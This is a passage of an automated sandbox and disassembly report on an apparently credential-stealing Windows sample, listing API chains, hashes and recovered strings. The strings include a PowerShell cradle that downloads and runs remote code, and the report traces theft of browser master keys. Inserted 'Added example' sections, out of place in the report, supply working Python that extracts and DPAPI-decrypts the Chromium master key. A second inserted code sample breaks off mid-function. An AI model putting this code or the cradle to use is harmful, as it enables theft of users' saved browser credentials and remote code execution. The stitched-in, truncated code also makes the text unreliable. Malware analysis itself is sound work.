                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                      • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                      • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02309C53
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 02309C78
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 02309C98
                                      • ReadFile.KERNEL32(000000FF,?,00000000,023016F6,00000000), ref: 02309CC1
                                      • LocalFree.KERNEL32(023016F6), ref: 02309CF7
                                      • CloseHandle.KERNEL32(000000FF), ref: 02309D01
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                      • Instruction ID: 84ac4d8f3e20539679f6f6ec31d97be843f1fc6d4657c170a6f31836e0277ccb
                                      • Instruction Fuzzy Hash: B731F4B8A40209EFDB24CF94C895BAE77F5FF49705F108158E915AB2D0C778AA41CFA1
                                      APIs
                                      • __getptd.LIBCMT ref: 0041C9EA
                                        • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                        • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                      • __amsg_exit.LIBCMT ref: 0041CA0A
                                      • __lock.LIBCMT ref: 0041CA1A
                                      • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                      • free.MSVCRT ref: 0041CA4A
                                      • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                      • String ID:
                                      • API String ID: 634100517-0
                                      • Opcode ID: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                                      • Instruction ID: 63787520114d18ae3399c837c16bfac6c494309a1b2e91ce42418771fe72ad0a
                                      • Instruction Fuzzy Hash: DD01C431A817299BC722EB669C857DE77A0BF04794F11811BE814A7390C73C69D2CBDD
                                      APIs
                                      • __getptd.LIBCMT ref: 0231CC51
                                        • Part of subcall function 0231C206: __getptd_noexit.LIBCMT ref: 0231C209
                                        • Part of subcall function 0231C206: __amsg_exit.LIBCMT ref: 0231C216
                                      • __amsg_exit.LIBCMT ref: 0231CC71
                                      • __lock.LIBCMT ref: 0231CC81
                                      • InterlockedDecrement.KERNEL32(?), ref: 0231CC9E
                                      • free.MSVCRT ref: 0231CCB1
                                      • InterlockedIncrement.KERNEL32(0042B980), ref: 0231CCC9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                      • String ID:
                                      • API String ID: 634100517-0
                                      • Opcode ID: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                                      • Instruction ID: 1f85943197c0b051f6a3aafb624ccd548f9341119587772803849289e6ad69cb
                                      • Instruction Fuzzy Hash: 82012231A81B25ABCB3CAB64944475CB761FF00754F040517DC10A72A0CB346C83DFDA
                                      APIs
                                      • strlen.MSVCRT ref: 00416F1F
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                        • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                        • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                      • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                        • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strlen$MemoryProcessQueryReadVirtual
                                      • String ID: @
                                      • API String ID: 2950663791-2766056989
                                      • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                      • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                      APIs
                                      • strlen.MSVCRT ref: 02317186
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,02317401,00000000,00420BA8,00000000,00000000), ref: 023171B4
                                        • Part of subcall function 02316E37: strlen.MSVCRT ref: 02316E48
                                        • Part of subcall function 02316E37: strlen.MSVCRT ref: 02316E6C
                                      • VirtualQueryEx.KERNEL32(02317574,00000000,?,0000001C), ref: 023171F9
                                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02317401), ref: 0231731A
                                        • Part of subcall function 02317047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 0231705F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strlen$MemoryProcessQueryReadVirtual
                                      • String ID: @
                                      • API String ID: 2950663791-2766056989
                                      • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction ID: 971d6dd3b4e891c500aef27bb550c13383940c6bb412e2b715852f9a42312f1e
                                      • Instruction Fuzzy Hash: BC51E5B1E04109EBDB08CF99D981AEFB7B6BF88300F148519F915A7240D734EA12CBA5
                                      APIs
                                      • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: *n@$*n@
                                      • API String ID: 1029625771-193229609
                                      • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                      • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                      • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                      APIs
                                      • lstrcat.KERNEL32(?,0064A30C), ref: 02314A42
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                      • lstrcat.KERNEL32(?,00000000), ref: 02314A68
                                      • lstrcat.KERNEL32(?,?), ref: 02314A87
                                      • lstrcat.KERNEL32(?,?), ref: 02314A9B
                                      • lstrcat.KERNEL32(?,0064A284), ref: 02314AAE
                                      • lstrcat.KERNEL32(?,?), ref: 02314AC2
                                      • lstrcat.KERNEL32(?,0064A2C8), ref: 02314AD6
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 02318FF7: GetFileAttributesA.KERNEL32(00000000,?,02301DBB,?,?,00425654,?,?,00420E1F), ref: 02319006
                                        • Part of subcall function 023147D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 023147E7
                                        • Part of subcall function 023147D7: RtlAllocateHeap.NTDLL(00000000), ref: 023147EE
                                        • Part of subcall function 023147D7: wsprintfA.USER32 ref: 0231480D
                                        • Part of subcall function 023147D7: FindFirstFileA.KERNEL32(?,?), ref: 02314824
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                      • Instruction ID: bece118181bc06011b48724e5ee7cab725ca69344f5f4a77cb2abcb02e5b88ec
                                      • Instruction Fuzzy Hash: 673153B69402186BDB28FBF0DC84EED737AAB58700F4045C9B64596080EEB49789CF99
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                      Strings
                                      • ')", xrefs: 00412CB3
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                      • <, xrefs: 00412D39
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                      • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                      • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 023014A5
                                      • __aulldiv.LIBCMT ref: 023014BF
                                      • __aulldiv.LIBCMT ref: 023014CD
                                      • ExitProcess.KERNEL32 ref: 023014FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction ID: ce0d26527546c46b4a6c63f6e9c4e9ef6bbbb26aed3d6a2e99e44550847b7832
                                      • Instruction Fuzzy Hash: A0016DB0A40308FAEF20DBD0CC99B9DBBB9AB00705F208448E7097B2C0D7B495418B69
                                      APIs
                                      • memcmp.MSVCRT(?,00421264,00000003), ref: 0230A094
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02310CC7: memset.MSVCRT ref: 02310E83
                                        • Part of subcall function 02310CC7: lstrcat.KERNEL32(?,00000000), ref: 02310E9C
                                        • Part of subcall function 02310CC7: lstrcat.KERNEL32(?,00420D7C), ref: 02310EAE
                                        • Part of subcall function 02310CC7: lstrcat.KERNEL32(?,00000000), ref: 02310EC4
                                        • Part of subcall function 02310CC7: lstrcat.KERNEL32(?,00420D80), ref: 02310ED6
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • memcmp.MSVCRT(?,00421114,00000003), ref: 0230A116
                                      • memset.MSVCRT ref: 0230A14F
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0230A1A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                      • String ID: @
                                      • API String ID: 1977917189-2766056989
                                      • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                      • Instruction ID: 3a8265ea6789dd2155673e83019bdfbb2bae93e4f350a80e22ca301d60357a35
                                      • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                      • Instruction Fuzzy Hash: B1615E31600248EFCB28EFA4DDA5FED7776AF44705F408118EA0AAB5D0DB746A45CF51
                                      APIs
                                      • strtok_s.MSVCRT ref: 00410DB8
                                      • strtok_s.MSVCRT ref: 00410EFD
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s$lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 348468850-0
                                      • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                      • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                      • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                      • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                        • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                        • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                      • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                        • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                        • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                        • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                        • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 3731072634-738592651
                                      • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                      • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                      • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                      • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
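Added example, not code from the sample or from Joe Sandbox: the chain above (StrStrA for the literal "encrypted_key":", CryptStringToBinaryA with dwFlags 0x1, which is CRYPT_STRING_BASE64, memcmp against "DPAPI" for 5 bytes, then CryptUnprotectData followed by LocalFree) is the usual recovery of the Chromium os_crypt master key from a browser profile's Local State file. The Python below reproduces the offline part of that handling so the artefact can be recognised and checked during triage. The Local State JSON is constructed and the DPAPI blob inside it is fake; the CryptUnprotectData step is shown for completeness and only runs on Windows under the logon that created the blob.

```python
"""Chromium 'Local State' master-key handling, mirroring the API chain in the trace:
StrStrA('"encrypted_key":"') -> CryptStringToBinaryA(CRYPT_STRING_BASE64)
-> memcmp(..., "DPAPI", 5) -> CryptUnprotectData. Added example; not the sample's code."""
import base64
import json
import sys
from typing import Optional

DPAPI_PREFIX = b"DPAPI"            # the 5 bytes compared by memcmp(?, "DPAPI", 5) in the trace
CRYPT_STRING_BASE64 = 0x1          # dwFlags value passed to CryptStringToBinaryA in the trace
KEY_MARKER = '"encrypted_key":"'   # the literal handed to StrStrA

# Constructed sample, not a real profile: a fake DPAPI blob (the 0x01000000 + provider GUID
# header that real blobs start with, followed by filler) wrapped the way Chromium stores it.
FAKE_DPAPI_BLOB = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb") + b"\x11" * 16
SAMPLE_LOCAL_STATE = json.dumps(
    {"os_crypt": {"encrypted_key": base64.b64encode(DPAPI_PREFIX + FAKE_DPAPI_BLOB).decode()}},
    separators=(",", ":"),   # compact form: the substring match needs no space after the colon
)


def find_encrypted_key(local_state_text: str) -> Optional[str]:
    """Substring scan like StrStrA, not a JSON parse: returns the base64 value or None."""
    i = local_state_text.find(KEY_MARKER)
    if i < 0:
        return None
    start = i + len(KEY_MARKER)
    end = local_state_text.find('"', start)
    return local_state_text[start:end] if end > start else None


def split_dpapi_blob(b64_key: str) -> bytes:
    """Base64-decode (CryptStringToBinaryA, flag 0x1) and strip the 5-byte DPAPI tag.
    Raises ValueError when the tag is missing, i.e. where the memcmp branch would fail."""
    raw = base64.b64decode(b64_key, validate=True)
    if not raw.startswith(DPAPI_PREFIX):
        raise ValueError("encrypted_key is not DPAPI-wrapped")
    return raw[len(DPAPI_PREFIX):]


def recover_master_key_blob(local_state_text: str) -> bytes:
    """Offline part of the chain: returns the raw DPAPI blob that still needs unprotecting."""
    b64 = find_encrypted_key(local_state_text)
    if b64 is None:
        raise ValueError("no encrypted_key in Local State")
    return split_dpapi_blob(b64)


def unprotect_on_windows(blob: bytes) -> bytes:
    """Last step of the chain, CryptUnprotectData then LocalFree, as in the trace.
    Only works on Windows under the same user logon that protected the blob."""
    if sys.platform != "win32":
        raise NotImplementedError("DPAPI is only available on Windows")
    import ctypes
    import ctypes.wintypes as wt

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", wt.DWORD), ("pbData", ctypes.POINTER(ctypes.c_char))]

    buf = ctypes.create_string_buffer(blob, len(blob))
    data_in, data_out = DATA_BLOB(len(blob), buf), DATA_BLOB()
    ok = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(data_in), None, None, None, None, 0, ctypes.byref(data_out))
    if not ok:
        raise ctypes.WinError()
    try:
        return ctypes.string_at(data_out.pbData, data_out.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(data_out.pbData)
```

Two details carry over from the trace into the code: the marker is matched as a raw substring, so a Local State that is not written compactly would not match, and the DPAPI prefix is checked before any decryption is attempted, which is the point at which the sample's memcmp decides whether to call into CRYPT32.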
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CodeInfoPageValidmemset
                                      • String ID:
                                      • API String ID: 703783727-0
                                      • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                      • Instruction ID: a3435fac16ce18e9fdb67cc590e267ab347053f1ffde49ab94ecc47a095eee1e
                                      • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                      • Instruction Fuzzy Hash: FA31D631A842919EDB2E8F75CC94379BFA49B06315B18A9ABD881CF592C728C405C763
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 02316BD3
                                      • sscanf.NTDLL ref: 02316C00
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02316C19
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02316C27
                                      • ExitProcess.KERNEL32 ref: 02316C41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                      • Instruction ID: 1da1f3f28ce8f835462f6823edd255195a3c79fea5b165424beae7c0d14f674a
                                      • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                      • Instruction Fuzzy Hash: 3521C9B5D14209AFCF08EFE4D9459EEB7BAFF48301F04852EE516A3250EB345605CB65
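Added example, not the sample's code: the chain above (GetSystemTime, sscanf, SystemTimeToFileTime on both the current time and a parsed one, ExitProcess) reads as a date comparison that can end the process. That reading, the direction of the comparison and the "%d.%d.%d"-style format assumed for sscanf are assumptions; the real format string is not shown on the page. The Python below reproduces the FILETIME arithmetic so an analyst who recovers a date string from the dump can check on which side of it a given clock falls.

```python
"""FILETIME-based date gate, reconstructing the chain GetSystemTime -> sscanf ->
SystemTimeToFileTime (x2) -> ExitProcess. Added example; the purpose of the check and
the sscanf format string are assumptions, not facts taken from the report."""
import re
from datetime import datetime, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)   # origin used by SystemTimeToFileTime
TICKS_PER_SECOND = 10_000_000                                  # FILETIME counts 100 ns intervals


def systemtime_to_filetime(year, month, day, hour=0, minute=0, second=0, millis=0) -> int:
    """Integer equivalent of SystemTimeToFileTime: 100 ns ticks since 1601-01-01 UTC."""
    dt = datetime(year, month, day, hour, minute, second, millis * 1000, tzinfo=timezone.utc)
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86_400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def parse_date_like_sscanf(text: str):
    """Hypothetical '%d.%d.%d' format read as day.month.year; the real format is not on the
    page. Returns (year, month, day), or None where sscanf would not fill all three fields."""
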